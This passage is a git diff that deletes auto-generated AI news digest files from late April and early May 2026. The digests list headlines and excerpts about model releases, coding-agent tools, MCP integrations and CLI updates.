source motion stack. NVIDIA is winning the physical AI era the same way it won LLM compute. - ---- - -## [OpenAI Releases GPT-5.5 The new model tops the benchmarks against its main rivals, Claude Opus 4.7 and Google's Gemini 3.1 Pro, even outperforming GPT-5.4 Pro in some areas. The model is built for agentic tasks and ease of use: GPT-5.5 fig…](https://x.com/News_pulse360/status/2048733780744278450) -*X / @news_pulse360* | 27/04/2026 | Score: 1.00 -Tags: product_launch - -> OpenAI Releases GPT-5.5 The new model tops the benchmarks against its main rivals, Claude Opus 4.7 and Google's Gemini 3.1 Pro, even outperforming GPT-5.4 Pro in some areas. The model is built for agentic tasks and ease of use: GPT-5.5 figures out what you're trying to do - ---- - -## [OpenAI has introduced Privacy Filter, a locally runnable open-weight AI model for context-aware detection and redaction of personally identifiable information in text. The model is now available on platforms like Hugging Face and GitHub. h…](https://x.com/AlternativeTo/status/2048666474181808532) -*X / @alternativeto* | 27/04/2026 | Score: 1.00 -Tags: product_launch - -> OpenAI has introduced Privacy Filter, a locally runnable open-weight AI model for context-aware detection and redaction of personally identifiable information in text. The model is now available on platforms like Hugging Face and GitHub. https:// alternativeto.net/news/2026/4/op enai-releases-privacy-filter-a-local-open-weight-model-built-for-personal-data-masking/ … - ---- - -## [two model releases shipped on the same day, april 24. it’s worth putting them next to each other. // openai released GPT-5.5 at $5/$30 per million in/out tokens. closed weights, 1M context, agent stack baked in. // deepseek released V4 the…](https://x.com/witcheer/status/2048665173326532861) -*X / @witcheer* | 27/04/2026 | Score: 1.00 -Tags: product_launch - -> two model releases shipped on the same day, april 24. it’s worth putting them next to each other. // openai released GPT-5.5 at $5/$30 per million in/out tokens. closed weights, 1M context, agent stack baked in. // deepseek released V4 the same day. V4-Pro at $1.74/$3.48, - ---- - diff --git a/data/digest-2026-04-28.md b/data/digest-2026-04-28.md deleted file mode 100644 index e1c579c..0000000 --- a/data/digest-2026-04-28.md +++ /dev/null @@ -1,123 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-28** | 15 stories | Auto-generated from 683 archived stories - ---- - -## [Hermes Agent v0.11.0 — 700 Pull Requests from 200 Contributors](https://x.com/NousResearch/status/2047518675163636112) -*Aligned News (Scoble)* | 28/04/2026 | Score: 1.00 -Tags: open_source, developer_tool, tool_update, agent_tool - -> Hermes Agent v0.11.0 launched with 700+ pull requests from 200+ contributors, demonstrating the scale of open source AI agent development. The release is the largest update to the framework to date. - ---- - -## [Qwen Code sdk-typescript-v0.1.7 released](https://github.com/QwenLM/qwen-code/releases/tag/sdk-typescript-v0.1.7) -*GitHub Releases · Qwen Code* | 28/04/2026 | Score: 0.94 -Tags: api_update, github_release, developer_tool, cli_tool - -> ## Bundled CLI Version This SDK release bundles CLI version: 0.15.3 Source: latest stable CLI from npm --- ## Bundled CLI Version This SDK release bundles CLI version: 0.13.1 Source: latest stable CLI from npm --- > Backfilled release for npm-published version 0.1.5 (original workflow failed before GitHub release creation). ## What's Changed * chore: bump version to 0.8.2 by @Mingholy in https://github.com/QwenLM/qwen-code/pull/1632 * chore(release): sdk-typescript v0.1.4 by @qwen-c - ---- - -## [Is your security team struggling to monitor AI agent activity in SaaS environments? We are expanding our @ChatGPTapp Enterprise integration with CrowdStrike Falcon Shield to deliver enhanced audit logging and continuous activity monitoring…](https://x.com/CrowdStrike/status/2049179351837512138) -*X / @crowdstrike* | 28/04/2026 | Score: 1.00 -Tags: tool_update, agent_tool - -> Is your security team struggling to monitor AI agent activity in SaaS environments? We are expanding our @ChatGPTapp Enterprise integration with CrowdStrike Falcon Shield to deliver enhanced audit logging and continuous activity monitoring. Track administrative changes, tool - ---- - -## [Gemini Launches Agentic Trading on a Regulated US Exchange](https://x.com/xHub_AI/status/2049131460460745232) -*Aligned News (Scoble)* | 28/04/2026 | Score: 1.00 -Tags: product_launch, tool_update - -> Braygent wants to post about Gemini's Agentic Trading as the first regulated US exchange to enable AI model integration for live trading, arguing it changes what AI agents are allowed to do in the real world. - ---- - -## [NVIDIA Ships One Model That Replaces Vision Speech and Text Chain](https://x.com/benitoz/status/2049168050495053924) -*Aligned News (Scoble)* | 28/04/2026 | Score: 1.00 -Tags: open_source, tool_update - -> Braygent wants to post about NVIDIA Nemotron 3 Nano Omni as a genuinely important release that unifies vision, speech, and text in one model, enabling 9x more agents per GPU with open weights. - ---- - -## [Warp Terminal Goes Open Source](https://x.com/zeddotdev/status/2049167033275728343) -*Aligned News (Scoble)* | 28/04/2026 | Score: 1.00 -Tags: open_source, cli_tool - -> Braygent wants to post about Warp going open source, arguing it signals the maturation of the AI developer tools market and the continued victory of open source in AI infrastructure. - ---- - -## [NEWS: AWS and OpenAI officially announce their partnership. Now available in limited preview on Amazon Bedrock: • Latest OpenAI models • Codex coding agent • Managed Agents powered by OpenAI](https://x.com/ainews_24_7/status/2049178579510956193) -*X / @ainews_24_7* | 28/04/2026 | Score: 1.00 -Tags: product_launch, agent_tool - -> NEWS: AWS and OpenAI officially announce their partnership. Now available in limited preview on Amazon Bedrock: • Latest OpenAI models • Codex coding agent • Managed Agents powered by OpenAI - ---- - -## [NVIDIA launches Nemotron 3 Nano Omni, a unified multimodal AI model now on Amazon SageMaker. NVIDIA's release addresses current inefficiencies in multimodal AI agent systems. Tracked across 4 posts, 4 origins, and 4 publishers.](https://x.com/earlyn_ai/status/2049176023724359681) -*X / @earlyn_ai* | 28/04/2026 | Score: 1.00 -Tags: product_launch, agent_tool - -> NVIDIA launches Nemotron 3 Nano Omni, a unified multimodal AI model now on Amazon SageMaker. NVIDIA's release addresses current inefficiencies in multimodal AI agent systems. Tracked across 4 posts, 4 origins, and 4 publishers. - ---- - -## [shipping claude-manager today. it's a fuzzy TUI for every Claude Code chat you've ever had. captures every session via a silent shell hook -> SQLite -> instantly resumable from any directory by name. free, open source. demo below.](https://x.com/DevLsx/status/2049019913465979131) -*X / @devlsx* | 28/04/2026 | Score: 1.00 -Tags: open_source, cli_tool - -> shipping claude-manager today. it's a fuzzy TUI for every Claude Code chat you've ever had. captures every session via a silent shell hook -> SQLite -> instantly resumable from any directory by name. free, open source. demo below. - ---- - -## [I built a framework for running AI teammates in your Slack, operated entirely from inside Claude Code](https://reddit.com/r/ClaudeAI/comments/1sxy6og/i_built_a_framework_for_running_ai_teammates_in/) -*Reddit r/ClaudeAI* | 28/04/2026 | Score: 0.86 -Tags: api_update, developer_tool - -> I run a small smart-home company called Ginnie (hence the name). There's always more work than hands. Investigations to run, dashboards to scan, follow-ups to chase. I wanted more hands. Real teammates, not chatbots, not function-calling demos. So I built ginnie-agents and ran my own team on it for months. Open-sourcing it now. What it is: a framework for a team of autonomous AI agents in your Slack workspace. Each agent has: \- Its own Slack identity, app, avatar, channel \- Persistent thre - ---- - -## [Qwen Code v0.15.4 released](https://github.com/QwenLM/qwen-code/releases/tag/v0.15.4) -*GitHub Releases · Qwen Code* | 28/04/2026 | Score: 0.78 -Tags: api_update, cli_tool - -> ## What's Changed * feat: Adds Catalan language support by @jordimas in https://github.com/QwenLM/qwen-code/pull/3643 * fix(vscode-companion): slash command completion not triggering after message submit by @yiliang114 in https://github.com/QwenLM/qwen-code/pull/3609 * fix(cli): guard gradient rendering without colors by @yiliang114 in https://github.com/QwenLM/qwen-code/pull/3640 * fix(config): support QWEN_CODE_API_TIMEOUT_MS across OAuth and non-OAuth paths by @B-A-M-N in https://github.com/Q - ---- - -## [Open source package with 1 million monthly downloads stole user credentials](https://arstechnica.com/security/2026/04/open-source-package-with-1-million-monthly-downloads-stole-user-credentials/) -*Ars Technica AI* | Score: 0.74 -Tags: open_source, developer_tool - ---- - -## [Your Claude Code project dashboard is now on the Mac App Store](https://reddit.com/r/ClaudeAI/comments/1syfl97/your_claude_code_project_dashboard_is_now_on_the/) -*Reddit r/ClaudeAI* | 28/04/2026 | Score: 0.70 -Tags: mcp, cli_tool - -> Follow up to my .story/ post last week. The Mac companion is now live on the Mac App Store, free. App Store: [https://apps.apple.com/us/app/storybloq/id6761348691](https://apps.apple.com/us/app/storybloq/id6761348691) Quick recap if you missed the original. Storybloq is a project tracker that lives in `.story/` inside your repo. Tickets, issues, roadmap phases, lessons, session handovers. All JSON and markdown, editable in any text editor, git-trackable. The CLI and MCP server ex - ---- - -## [ComfyUI Raises $30M at $500M Valuation](https://x.com/robertnishihara/status/2047772168147374085) -*Aligned News (Scoble)* | 28/04/2026 | Score: 1.00 -Tags: open_source - -> Braygent wants to post about ComfyUI's $30M raise at $500M valuation as a signal about the business model for open source AI tools with large developer communities. - ---- - -## [Scoble on One AI Doing Everything: The Everything App Is Coming](https://x.com/Scobleizer/status/2048690528653660399) -*Aligned News (Scoble)* | 28/04/2026 | Score: 1.00 -Tags: tool_update - -> Robert posted that one AI will do everything and the OS itself should be rebuilt by AI for AI to use, with the everything app coming as a result. The vision is more radical than most industry commentary about AI integration. - ---- - diff --git a/data/digest-2026-04-29.md b/data/digest-2026-04-29.md deleted file mode 100644 index 8b3a4f9..0000000 --- a/data/digest-2026-04-29.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-29** | 15 stories | Auto-generated from 700 archived stories - ---- - -## [Vercel CLI @vercel/python-workers@0.0.19 released](https://github.com/vercel/vercel/releases/tag/%40vercel/python-workers%400.0.19) -*GitHub Releases · Vercel CLI* | 29/04/2026 | Score: 0.62 -Tags: api_update, developer_tool, cli_tool - -> ### Patch Changes - b357f9d: Align queue deployment pinning with the TypeScript SDK by distinguishing automatic pinning, explicit deployment IDs, and explicit unpinned sends. - fddd88c: [vercel-workers] payload type validation - fb68ac6: Add explicit Python queue worker retry and acknowledgement directives. Workers can now return or raise `RetryAfter` and `Ack` to control retry and acknowledgement behavior. - ---- - -## [Converting Claude Code into the most intelligent Deep Research Agent](https://reddit.com/r/ClaudeAI/comments/1sz9ib0/converting_claude_code_into_the_most_intelligent/) -*Reddit r/ClaudeAI* | 29/04/2026 | Score: 1.00 -Tags: open_source, developer_tool - -> Over the past several weeks, I've been working on HyperResearch, a Claude Code skill harness that converts CC into the most intelligent deep research framework out there. HyperResearch surpasses OpenAI, Google, and NVIDIA's offerings in the agentic search space based on DeepResearch Bench. It's open-source, installable with a single command, and uses your CC subscription, so you don't have to pay for OpenAI or Gemini Pro. It uses a 16-step pipeline that creates a searchable, persistent knowled - ---- - -## [Higgsfield MCP Is Now Inside OpenClaw, Hermes Agent, and NemoClaw](https://x.com/Maginative/status/2049200033665569020) -*Aligned News (Scoble)* | 29/04/2026 | Score: 1.00 -Tags: mcp, tool_update - -> Higgsfield MCP launched inside OpenClaw, Hermes Agent, and NemoClaw, enabling end-to-end content creation including video generation within a single agent session. - ---- - -## [AAIF Announces AGNTCon and MCPCon EU and NA for 2026](https://x.com/AgenticAIFdn/status/2039696612633571565) -*Aligned News (Scoble)* | 29/04/2026 | Score: 1.00 -Tags: mcp, product_launch - -> The Agentic AI Foundation announced its 2026 events lineup including AGNTCon and MCPCon in EU and NA, plus global MCP Dev Summits for agentic AI builders. - ---- - -## [Poolside AI Just Released Its First Public Models: Open Source and API](https://x.com/marah_i_abdin/status/2049161468017287490) -*Aligned News (Scoble)* | 29/04/2026 | Score: 1.00 -Tags: api_update, open_source - -> Braygent's take: Poolside's first public models are a significant stealth-to-public moment. The open-source Laguna XS.2 gives the community access to a serious coding-focused MoE model. - ---- - -## [Qwen Code v0.15.5 released](https://github.com/QwenLM/qwen-code/releases/tag/v0.15.5) -*GitHub Releases · Qwen Code* | 29/04/2026 | Score: 0.94 -Tags: mcp, cli_tool - -> ## What's Changed * mcp config as cli by @eliird in https://github.com/QwenLM/qwen-code/pull/1279 * fix(cli): refresh static header on model switch by @pomelo-nwu in https://github.com/QwenLM/qwen-code/pull/3667 * feat(core): wire background shells into the task_stop tool by @wenshao in https://github.com/QwenLM/qwen-code/pull/3687 * feat(skills): add tmux-real-user-testing skill for readable TUI test logs by @pomelo-nwu in https://github.com/QwenLM/qwen-code/pull/3577 * feat(cli): wire backgrou - ---- - -## [The final nail in the coffin for entry level creative freelancers just dropped](https://reddit.com/r/ClaudeAI/comments/1syu949/the_final_nail_in_the_coffin_for_entry_level/) -*Reddit r/ClaudeAI* | 29/04/2026 | Score: 0.94 -Tags: api_update, mcp - -> Anthropic just officially released the blender mcp connector today alongside adobe ,splice and sketchup, you can now type "create a low poly beach scene with palm trees and sunset lighting" into claude and watch it build the entire thing in blender in real time tadaaa. They even became an official blender development fund patron This is claude directly controlling blender through the python api which means it can modify existing scenes, debug your node setups, batch apply changes across objects - ---- - -## [Launched My First App Using Claude](https://reddit.com/r/ClaudeAI/comments/1sz38u6/launched_my_first_app_using_claude/) -*Reddit r/ClaudeAI* | 29/04/2026 | Score: 0.86 -Tags: api_update, tool_update - -> Hello everyone. About a week ago, I was able to launch my very own app, all of it being built by Claude. It’s a vehicle management app. Allows you to keep track of how much you’re spending on your car(s), comes with a built in maintenance schedule that’s customizable, fuel tracking system, a showroom mode for people who would like to showcase their vehicles, and an AI assistant (Claude API). It’s all front end, and everything is stored locally on the users device. The API calls do require a da - ---- - -## [Claude Design is amazing but I keep hitting rate limits. Tested an open source skill that runs on your normal subscription limits — here's both outputs for you to judge.](https://reddit.com/r/ClaudeAI/comments/1sz1rca/claude_design_is_amazing_but_i_keep_hitting_rate/) -*Reddit r/ClaudeAI* | 29/04/2026 | Score: 0.78 -Tags: api_update, open_source - -> Claude design is genuinely great for building HTML layouts and presentations. the problem is it burns through your usage fast — i was hitting limits after a few iterations. Found an open source claude code skill called huashu-design that does the same kind of thing (HTML prototypes, slide decks, animations) but runs through your normal claude code subscription. no separate rate limit. Wanted to see how they actually compare, so i gave both the exact same prompt. one shot each, no follow-up e - ---- - -## [Fully 3D-modeled Raspberry Pi 5 enclosure made 100% through Claude's Blender MCP, zero manual modeling](https://reddit.com/r/ClaudeAI/comments/1sz748q/fully_3dmodeled_raspberry_pi_5_enclosure_made_100/) -*Reddit r/ClaudeAI* | 29/04/2026 | Score: 0.70 -Tags: mcp, tool_update - -> So I've been experimenting with Claude's new Blender MCP integration and decided to push it to its limits with a real engineering project: a complete, print-ready enclosure for the Raspberry Pi 5, modeled entirely through AI prompts, no hands on keyboard in Blender at all. **What Claude did autonomously:** * Researched and confirmed the official Raspberry Pi 5 mechanical dimensions from the datasheet (85×56mm PCB, exact mounting hole positions at 3.5/61.5 × 3.5/52.5mm) * Mapped every port and - ---- - -## [Pattern I'm using to keep Claude Code productive on overnight unattended runs](https://reddit.com/r/ClaudeAI/comments/1syr2pt/pattern_im_using_to_keep_claude_code_productive/) -*Reddit r/ClaudeAI* | 29/04/2026 | Score: 0.70 -Tags: api_update, developer_tool - -> Been running Claude Code on multi-hour autonomous sessions for a few months and kept hitting the same wall: the longer it runs, the worse the work gets. Not a context-window problem (1M handles that fine), but a feedback-loop problem. Iteration N+10 makes the same mistakes it made at iteration N, because nothing updates between iterations except the code. Built a small framework around three pieces that, between them, solved it for me. Together this framework as enabled me to consistently run v - ---- - -## [Your Claude Code project dashboard is now on the Mac App Store](https://reddit.com/r/ClaudeAI/comments/1symv0c/your_claude_code_project_dashboard_is_now_on_the/) -*Reddit r/ClaudeAI* | 29/04/2026 | Score: 0.70 -Tags: mcp, cli_tool - -> Follow up to my .story/ post last week. The Mac companion is now live on the Mac App Store, free. App Store: [https://apps.apple.com/us/app/storybloq/id6761348691](https://apps.apple.com/us/app/storybloq/id6761348691) Quick recap if you missed the original. Storybloq is a project tracker that lives in `.story/` inside your repo. Tickets, issues, roadmap phases, lessons, session handovers. All JSON and markdown, editable in any text editor, git-trackable. The CLI and MCP server expose it to - ---- - -## [LosslessCut v3.68.0 released](https://github.com/mifi/lossless-cut/releases/tag/v3.68.0) -*GitHub Releases · LosslessCut* | 29/01/2026 | Score: 0.70 -Tags: github_release, tool_update - -> ⚠️ **Warning:** The keyboard handling has changed as of v3.67.0 and later. If you after upgrading to this version ever revert to a version prior to v3.67.0, you **will lose your keyboard bindings**. Also there's an issue with migrating certain shortcuts with some keyboard layouts to the new version. See [TLDR here.](https://github.com/mifi/lossless-cut/issues/2671#issuecomment-3727638311) Note: there's a bug with the [app size of this version being larger](https://github.com/mifi/lossless-cut - ---- - -## [I built a Kanban board for Claude Code so I can run agent sessions straight from cards](https://reddit.com/r/ClaudeAI/comments/1sye8bs/i_built_a_kanban_board_for_claude_code_so_i_can/) -*Reddit r/ClaudeAI* | 28/04/2026 | Score: 0.54 -Tags: open_source, cli_tool - -> I've been running 4-5 Claude Code sessions in parallel and kept losing track - which terminal had the auth work, which one was the bug fix, what's actually done. So I added a Kanban board to **Vibeyard** (an open-source IDE I'm building for Claude Code). Each card is a task. Click run → it spins up a Claude session scoped to that task. When Claude finishes, the card moves itself to Done. It turned Claude from "a terminal I talk to" into - ---- - -## [Are we underweighting execution benchmarks when we talk about open-source frontier models?](https://reddit.com/r/StableDiffusion/comments/1szb07b/are_we_underweighting_execution_benchmarks_when/) -*Reddit r/StableDiffusion* | 29/04/2026 | Score: 1.00 -Tags: open_source - -> A lot of open-source model discussion still centers on broad IQ-style evals or raw one-turn quality. What feels underdiscussed to me is whether execution-heavy evaluation is becoming its own frontier. Ling-2.6-1T being open-sourced on Hugging Face today is one reason I’m thinking about this. Its stated profile is unusually explicit: precise instruct execution, strong results on execution-heavy / agentic tasks, low token overhead, and long-context task handling. If more frontier open models - ---- - diff --git a/data/digest-2026-04-30.md b/data/digest-2026-04-30.md deleted file mode 100644 index 581a568..0000000 --- a/data/digest-2026-04-30.md +++ /dev/null @@ -1,117 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-30** | 15 stories | Auto-generated from 692 archived stories - ---- - -## [[Open Source] We built a local code search MCP for Claude Code that uses ~98% fewer tokens than grep+read](https://reddit.com/r/ClaudeAI/comments/1szvo7t/open_source_we_built_a_local_code_search_mcp_for/) -*Reddit r/ClaudeAI* | 30/04/2026 | Score: 1.00 -Tags: api_update, mcp, open_source - -> Working on large codebases with Claude Code, we kept running into the same issue: when Claude looks for relevant code, it falls back to grep, reading full files, or launching multiple subagents. This burns through tokens, and often misses the relevant code. There are some existing solutions (that we also benchmarked against), but they all had issues (too slow, needs API keys, quality not good enough, etc). We built [Semble](https://github.com/MinishLab/semble) to fix this. It's a local MCP serv - ---- - -## [The "Big Tech Steamroller" is coming for your AI agent. Before you write another line of code, ask yourself: "Can a trillion-dollar company do this with a single API update?" If the answer is yes, pivot now.](https://x.com/AI_BioPhD/status/2049769860897321027) -*X / @ai_biophd* | 30/04/2026 | Score: 1.00 -Tags: api_update, agent_tool - -> The "Big Tech Steamroller" is coming for your AI agent. Before you write another line of code, ask yourself: "Can a trillion-dollar company do this with a single API update?" If the answer is yes, pivot now. - ---- - -## [Cursor SDK — The Democratization of Agent Development](https://x.com/Marktechpost/status/2049711306643759265) -*Aligned News (Scoble)* | 30/04/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> Cursor's SDK reduces agent deployment to three lines of TypeScript, democratizing agent development. The release is the AWS moment for agents, dramatically lowering the barrier to production deployment. - ---- - -## [Codex CLI 0.128.0 is out! Persisted /goal workflows: create, pause, resume, clear codex update + configurable TUI keymaps Built-in permission profiles + sandbox CLI selection Changelog:](https://x.com/Codex_Changelog/status/2049905403262079480) -*X / @codex_changelog* | 30/04/2026 | Score: 0.97 -Tags: cli_tool, tool_update - -> Codex CLI 0.128.0 is out! Persisted /goal workflows: create, pause, resume, clear codex update + configurable TUI keymaps Built-in permission profiles + sandbox CLI selection Changelog: - ---- - -## [Show HN: Pu.sh – a full coding-agent harness in 400 lines of shell](https://pu.dev/) -*Hacker News* | 30/04/2026 | Score: 0.88 -Tags: cli_tool, agent_tool - ---- - -## [26 years ago I took a website management company public on NASDAQ (200+ staff, 60 engineers). Over just a few weekends I rebuilt a better product using Claude Code.](https://reddit.com/r/ClaudeAI/comments/1t00h8u/26_years_ago_i_took_a_website_management_company/) -*Reddit r/ClaudeAI* | 30/04/2026 | Score: 0.86 -Tags: mcp, open_source - -> Yeah, me again, same guy from [the Legends of Future Past post](https://www.reddit.com/r/ClaudeAI/comments/1sfsz67/i_gave_claude_my_dead_games_30yearold_files_and/) a few weeks back (where I resurrected a 30+ year old game I lost the source to from its script files, using Claude Code). A bunch of folks asked what else I was working on. This is it. LightCMS is now open source: [https://github.com/jonradoff/lightcms](https://github.com/jonradoff/lightcms) (MIT). About 47K lines of Go, 114 MCP too - ---- - -## [pnpm v11.0.3 released](https://github.com/pnpm/pnpm/releases/tag/v11.0.3) -*GitHub Releases · pnpm* | 30/04/2026 | Score: 0.84 -Tags: developer_tool, cli_tool - -> ## Patch Changes * Fix too many open files error sometimes happening on Windows, when creating command shims in `node_modules/.bin` [#11412](https://github.com/pnpm/pnpm/issues/11412). * Fix `ERR_PNPM_FETCH_404` when installing a project whose lockfile depends on a `file:` tarball. The previous behavior dropped the `tarball` field from `file:` and git-hosted resolutions when `lockfile-include-tarball-url=false` (the default), even though those URLs cannot be reconstructed from the package na - ---- - -## [Vercel CLI @vercel/python-workers@0.0.20 released](https://github.com/vercel/vercel/releases/tag/%40vercel/python-workers%400.0.20) -*GitHub Releases · Vercel CLI* | 30/04/2026 | Score: 0.76 -Tags: developer_tool, cli_tool - -> ### Patch Changes - 894e7d4: [python/vercel-workers] refactor framework-specific logic into vercel-workers - ---- - -## [Gemini CLI v0.40.1 released](https://github.com/google-gemini/gemini-cli/releases/tag/v0.40.1) -*GitHub Releases · Gemini CLI* | 30/04/2026 | Score: 0.70 -Tags: cli_tool, tool_update - -> ## What's Changed * fix(patch): cherry-pick 2194da2 to release/v0.40.0-pr-26153 to patch version v0.40.0 and create version 0.40.1 by @gemini-cli-robot in https://github.com/google-gemini/gemini-cli/pull/26268 **Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.40.0...v0.40.1 - ---- - -## [X announces a rebuilt ad platform powered by AI](https://techcrunch.com/2026/04/30/x-announces-a-rebuilt-ad-platform-powered-by-ai/) -*TechCrunch AI* | Score: 1.00 -Tags: product_launch - ---- - -## [Stripe introduces Link, a digital wallet that autonomous AI agents can use, too](https://techcrunch.com/2026/04/30/stripe-link-digital-wallet-ai-agents-shopping/) -*TechCrunch AI* | Score: 1.00 -Tags: product_launch - ---- - -## [The MCP Era Feels Like Déjà Vu 1 day ago • 3](https://huggingface.co/blog/Navid-AI/mcp-era-feels-like-deja-vu) -*Hugging Face Blog* | Score: 1.00 -Tags: mcp - ---- - -## [Most people use Claude Code like autocomplete. This tutorial shows how to use it like a system: agentic loops, subagents, MCP servers, real workflows. That’s the difference between “AI help” and real leverage. https:// claudedigest.com/tut…](https://x.com/ClaudeDigest/status/2049902211292127462) -*X / @claudedigest* | 30/04/2026 | Score: 1.00 -Tags: mcp - -> Most people use Claude Code like autocomplete. This tutorial shows how to use it like a system: agentic loops, subagents, MCP servers, real workflows. That’s the difference between “AI help” and real leverage. https:// claudedigest.com/tutorials/mdx/ mastering-claude-code … - ---- - -## [81% of dev teams use AI in testing, but the QE Lead is still human. Greenlyt changes that. Autonomous AI agent that owns your entire release quality process.](https://x.com/polsia/status/2049901864381288455) -*X / @polsia* | 30/04/2026 | Score: 1.00 -Tags: agent_tool - -> 81% of dev teams use AI in testing, but the QE Lead is still human. Greenlyt changes that. Autonomous AI agent that owns your entire release quality process. - ---- - -## [MiMo-V2.5-Pro Matches Opus 4.6 at 8x Lower Cost — Open Weights](https://x.com/itsPaulAi/status/2049862276832715177) -*Aligned News (Scoble)* | 30/04/2026 | Score: 1.00 -Tags: open_source - -> Braygent's take: MiMo-V2.5-Pro at 8x lower cost than Opus 4.6 is the open vs closed model story of 2026. The gap is closing fast. - ---- - diff --git a/data/digest-2026-05-01.md b/data/digest-2026-05-01.md deleted file mode 100644 index ac9324c..0000000 --- a/data/digest-2026-05-01.md +++ /dev/null @@ -1,123 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-01** | 15 stories | Auto-generated from 600 archived stories - ---- - -## [Built + open sourced anti-slopsquatting CLI](https://reddit.com/r/ClaudeAI/comments/1t0ltr5/built_open_sourced_antislopsquatting_cli/) -*Reddit r/ClaudeAI* | 01/05/2026 | Score: 0.86 -Tags: open_source, developer_tool, cli_tool - -> TL;DR: built an open source CLI that scans your repository's manifest (package.json, requirements.txt, go.mod) files for indicators of slopsquatting or other supply chain attack indicators. Repo: https://github.com/zhendahu/dep-doctor There's been a ton of supply chain attacks recently ([Axios](https://github.com/axios/axios/issues/10636), [LiteLLM](https://www.trendmicro.com/en_us/research/26/c/inside-litellm-supply-chain-compromise.html), [Trivy](https://www.paloaltonetworks.com/blog/cloud-s - ---- - -## [Vercel CLI @vercel/python-workers@0.0.21 released](https://github.com/vercel/vercel/releases/tag/%40vercel/python-workers%400.0.21) -*GitHub Releases · Vercel CLI* | 01/05/2026 | Score: 0.62 -Tags: api_update, developer_tool, cli_tool - -> ### Patch Changes - 6935baa: Refactor Python queue sdk into `_queue/` - 574c9f1: [vercel-workers] Replaces retention_seconds and delay_seconds with retention and delay which support timedelta, e.g retention=timedelta(hours=6) - ---- - -## [Bonkers. Also, told y’all! OpenAI: “One week since the launch of GPT-5.5, and it’s already our strongest model launch yet” API revenue: “growing more than 2x faster than any prior release” “Codex doubled revenue in under 7 days as enterpri…](https://x.com/firstadopter/status/2050264818972516799) -*X / @firstadopter* | 01/05/2026 | Score: 1.00 -Tags: api_update, agent_tool - -> Bonkers. Also, told y’all! OpenAI: “One week since the launch of GPT-5.5, and it’s already our strongest model launch yet” API revenue: “growing more than 2x faster than any prior release” “Codex doubled revenue in under 7 days as enterprise demand for agentic coding tools..” - ---- - -## [One week since the launch of GPT-5.5, and it’s already our strongest model launch yet. API revenue is growing more than 2x faster than any prior release, while Codex doubled revenue in under seven days as enterprise demand for agentic codi…](https://x.com/OpenAI/status/2050250926888468929) -*X / @openai* | 01/05/2026 | Score: 1.00 -Tags: api_update, agent_tool - -> One week since the launch of GPT-5.5, and it’s already our strongest model launch yet. API revenue is growing more than 2x faster than any prior release, while Codex doubled revenue in under seven days as enterprise demand for agentic coding tools keeps climbing. - ---- - -## [Meta released their Ads MCP and CLI today – if you use Claude or ChatGPT you should install this asap (resources in comments). What makes this annou This is the kind of move that separates the builders from the watchers.](https://x.com/yunara97/status/2050108352550592636) -*X / @yunara97* | 01/05/2026 | Score: 1.00 -Tags: mcp, cli_tool - -> Meta released their Ads MCP and CLI today – if you use Claude or ChatGPT you should install this asap (resources in comments). What makes this annou This is the kind of move that separates the builders from the watchers. - ---- - -## [Hermes Agent Is Now in LM Studio — The Open-Source Agent Ecosystem Is Growing Fast](https://x.com/NousResearch/status/2049878944007041210) -*Aligned News (Scoble)* | 01/05/2026 | Score: 1.00 -Tags: open_source, tool_update - -> Hermes Agent's integration with LM Studio brings it to one of the most popular local model runners. The open-source agent ecosystem is maturing quickly. - ---- - -## [Whohas – Command-line utility for cross-distro, cross-repository package search](https://github.com/whohas/whohas) -*Hacker News* | 01/05/2026 | Score: 0.99 -Tags: developer_tool, cli_tool - ---- - -## [Cloud Skills Are Still Just Skills - How Anthropic no longer releases new skills, and gates them within the Cloud now with Ultraplan, Ultrareview, and Cloud Security.](https://reddit.com/r/ClaudeAI/comments/1t0wlme/cloud_skills_are_still_just_skills_how_anthropic/) -*Reddit r/ClaudeAI* | 01/05/2026 | Score: 0.86 -Tags: product_launch, tool_update - -> https://vexjoy.com/posts/cloud-skills-are-still-just-skills/ The skill ecosystem’s strength is composability. I can take a review skill, pair it with a Go agent, wrap it in a pipeline that saves artifacts at phase boundaries. I can inspect every piece. When something fails, I can diagnose it because I can read the prompts. You can’t compose what you can’t read, and you can’t diagnose failures in a stage you can’t inspect. If Anthropic ships more features this way, the ecosystem splits into ope - ---- - -## [Found Zero day Claude Desktop + Chromium bug need to know where to submit report.](https://reddit.com/r/ClaudeAI/comments/1t0u20d/found_zero_day_claude_desktop_chromium_bug_need/) -*Reddit r/ClaudeAI* | 01/05/2026 | Score: 0.70 -Tags: mcp, developer_tool - -> Looking for official link / process to submit a vulnerability report for a high-risk official Claude Desktop + Chrome extension + native host + Cowork/MCP configuration that can become RAT-equivalent if a session, prompt chain, same-user process, or enabled extension is abused. Please let me know where I can submit this report. - ---- - -## [Example of using the GodotIQ MCP with Coding Agent to create video games](https://reddit.com/r/ClaudeAI/comments/1t0q8bf/example_of_using_the_godotiq_mcp_with_coding/) -*Reddit r/ClaudeAI* | 01/05/2026 | Score: 0.70 -Tags: mcp, agent_tool - -> I’ve developed an MCP server for Godot. Most coding agents in Godot today work blindly: they read files but don’t know where the nodes are in space, don’t understand the signals, and don’t see what calls what. Godotiq solves this, giving the agent a true understanding of the 2D/3D scene, the code, and the editor. To test it, I gave it some free assets I found online and a prompt, and let it run for about an hour. It produced a mini twin-stick survivors-style game with waves, bosses, power-up ca - ---- - -## [Mobile App with Clade](https://reddit.com/r/ClaudeAI/comments/1t0obje/mobile_app_with_clade/) -*Reddit r/ClaudeAI* | 01/05/2026 | Score: 0.70 -Tags: developer_tool, tool_update - -> Just a quick question. Is building a mobile app like this actually a legit approach? I recently came across someone building fairly complex web apps, for example a geo quiz with full database integration, using this workflow: He generates all the HTML, CSS and JS through Claude (the AI), deploys it to Netlify, connects a database like Supabase or Firebase, and then uses "Add to Homescreen" so it looks and feels like a native mobile app. No framework, no GitHub repo, no CI/CD, no app store. And h - ---- - -## [Turbo v2.9.7 released](https://github.com/vercel/turborepo/releases/tag/v2.9.7) -*GitHub Releases · Turbo* | 01/05/2026 | Score: 0.70 -Tags: github_release, tool_update - -> ## What's Changed ### eslint * chore: Upgrade dependencies to resolve their known vulnerabilities by @anthonyshew in https://github.com/vercel/turborepo/pull/12604 ### Examples * feat(sandbox): Bump @vercel/sandbox from v1 to beta by @marc-vercel in 